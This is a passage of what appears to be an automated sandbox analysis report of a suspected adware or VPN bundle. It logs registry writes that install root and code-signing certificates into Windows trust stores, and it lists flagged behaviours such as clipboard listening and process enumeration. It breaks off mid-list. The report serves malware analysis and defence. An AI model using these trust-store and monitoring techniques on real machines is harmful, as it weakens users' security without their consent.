\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
DpEditor.exepid process 3716 DpEditor.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Adw.exemsedge.exemsedge.exeidentity_helper.exesPc0vDiz.exepid process 4492 Adw.exe 4492 Adw.exe 4420 msedge.exe 4420 msedge.exe 4492 Adw.exe 4492 Adw.exe 3772 msedge.exe 3772 msedge.exe 1316 identity_helper.exe 1316 identity_helper.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe 1204 sPc0vDiz.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Adblock.exepid process 4860 Adblock.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
msedge.exepid process 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
